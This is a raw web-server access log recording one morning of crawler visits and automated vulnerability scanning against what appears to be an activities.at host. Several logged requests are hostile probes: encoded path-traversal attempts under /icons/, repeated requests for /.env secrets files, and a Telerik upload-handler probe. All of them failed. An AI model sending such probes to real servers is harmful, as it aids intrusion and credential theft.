45.156.129.105 - - [31/Jul/2024:07:27:36 +0200] "GET /WebInterface/ HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.225.232.96 - - [31/Jul/2024:07:27:51 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 289 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:10.0.12) Gecko/20100101 Firefox/10.0.12"
45.156.129.105 - - [31/Jul/2024:07:27:52 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:27:52 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:28:07 +0200] "GET /zabbix/favicon.ico HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:28:21 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:28:34 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:28:35 +0200] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:28:35 +0200] "GET /api/session/properties HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:28:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:28:49 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:28:49 +0200] "GET /showLogin.cc HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:29:03 +0200] "GET /admin/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:29:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:29:04 +0200] "GET /solr/ HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:29:17 +0200] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:29:32 +0200] "GET /webfig/ HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:29:47 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:30:00 +0200] "GET /console HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:30:16 +0200] "GET /static/historypage.js HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.224.128.43 - - [31/Jul/2024:07:30:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [31/Jul/2024:07:30:34 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
45.156.129.105 - - [31/Jul/2024:07:30:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:30:37 +0200] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:30:38 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:30:38 +0200] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:30:38 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:30:38 +0200] "GET /index.jsp HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:30:56 +0200] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.105 - - [31/Jul/2024:07:30:56 +0200] "GET /sugar_version.json HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
156.59.198.136 - - [31/Jul/2024:07:37:50 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004241503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:07:38:12 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002281503_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.225.232.96 - - [31/Jul/2024:07:38:56 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36"
156.59.198.136 - - [31/Jul/2024:07:42:22 +0200] "GET /renault.activities.at/htdocs/newsletter_log/nl_608250.txt HTTP/1.0" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:07:45:43 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110150903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:07:46:53 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11213631.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:07:54:03 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103081803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
149.50.103.48 - - [31/Jul/2024:07:56:44 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [31/Jul/2024:07:57:02 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-de.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:07:58:20 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010011203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
17.241.75.171 - - [31/Jul/2024:08:00:44 +0200] "GET /viewtopic.php?f=8&t=506 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
156.59.198.136 - - [31/Jul/2024:08:01:21 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108021403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:08:01:51 +0200] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3115778.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:08:04:04 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11044898.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:08:14:19 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3116107.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:08:35:35 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11306534.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
209.38.244.142 - - [31/Jul/2024:08:37:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
156.59.198.136 - - [31/Jul/2024:08:38:50 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101211603_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:08:39:12 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909061603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:08:44:10 +0200] "GET /default/cgi-bin/lang/tooltips_f/awstats-tt-cz.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:08:47:57 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109271003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:08:48:20 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202005041303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
184.105.139.70 - - [31/Jul/2024:08:48:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
184.105.139.70 - - [31/Jul/2024:08:51:10 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
156.59.198.136 - - [31/Jul/2024:08:51:18 +0200] "GET /default/cgi-bin/lang/tooltips_m/awstats-tt-br.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
184.105.139.70 - - [31/Jul/2024:08:52:17 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
156.59.198.135 - - [31/Jul/2024:08:53:22 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12239451.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
149.50.103.48 - - [31/Jul/2024:08:53:52 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [31/Jul/2024:08:57:32 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004281603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:09:04:00 +0200] "GET /default/cgi-bin/lang/tooltips_f/awstats-tt-is.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:09:05:50 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105310903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:09:07:00 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12468782.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:09:07:48 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11913566.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:09:08:10 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-se.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.249.48.202 - - [31/Jul/2024:09:10:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
209.97.178.72 - - [31/Jul/2024:09:17:44 +0200] "\x16\x03\x01\x01\xfc\x01" 400 383 "-" "-"
162.216.149.131 - - [31/Jul/2024:09:25:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [31/Jul/2024:09:42:48 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11035055.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:09:44:52 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3116111.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.138.120 - - [31/Jul/2024:09:45:32 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.138.120 - - [31/Jul/2024:09:45:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.120 - - [31/Jul/2024:09:45:36 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.120 - - [31/Jul/2024:09:45:37 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.120 - - [31/Jul/2024:09:45:37 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.136 - - [31/Jul/2024:09:46:03 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12490260.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:09:49:09 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10608559.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
149.50.103.48 - - [31/Jul/2024:09:49:37 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [31/Jul/2024:09:52:01 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10777685.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:09:56:41 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105221103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:10:11:27 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11600301.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:10:12:34 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110011103_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.182.38.125 - - [31/Jul/2024:10:13:31 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
5.182.38.125 - - [31/Jul/2024:10:13:32 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
94.156.68.162 - - [31/Jul/2024:10:20:41 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; MHA-AL00 Build/HUAWEIMHA-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.99 Mobile Safari/537.36 MMWEBID/9772 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN"
94.156.68.162 - - [31/Jul/2024:10:23:27 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 8.0.0; d-02K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Safari/537.36"
198.235.24.107 - - [31/Jul/2024:10:34:10 +0200] "\x16\x03\x01" 400 383 "-" "-"
198.235.24.107 - - [31/Jul/2024:10:34:11 +0200] "\x16\x03\x01" 400 383 "-" "-"
34.140.160.62 - - [31/Jul/2024:10:34:48 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.2"
156.59.198.135 - - [31/Jul/2024:10:37:20 +0200] "GET /default/cgi-bin/lang/tooltips_w/awstats-tt-fi.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:10:40:14 +0200] "GET /ed-test.activities.at/stats/lib/blacklist.txt HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:10:43:14 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107131603_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.10 - - [31/Jul/2024:10:43:19 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.10 - - [31/Jul/2024:10:43:19 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.136 - - [31/Jul/2024:10:43:52 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202003111303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.10 - - [31/Jul/2024:10:45:16 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.10 - - [31/Jul/2024:10:45:16 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.135 - - [31/Jul/2024:10:45:26 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11333366.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
17.241.227.67 - - [31/Jul/2024:10:45:51 +0200] "GET /memberlist.php?sid=54df32ee0ee0f7bf8a54e23511949d55 HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
185.242.226.10 - - [31/Jul/2024:10:46:02 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.10 - - [31/Jul/2024:10:46:02 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.136 - - [31/Jul/2024:10:51:41 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11253900.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Jul/2024:10:52:52 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12430518.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Jul/2024:10:53:13 +0200] "GET /renault.activities.at/htdocs/newsletter_log/nl_608222.txt HTTP/1.0" 404 316 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
149.50.103.48 - - [31/Jul/2024:10:54:39 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
17.241.219.39 - - [31/Jul/2024:10:55:02 +0200] "GET /gallery/image_page.php?album_id=1&image_id=115 HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)"
156.59.198.135 - - [31/Jul/2024:11:03:17 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006300903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
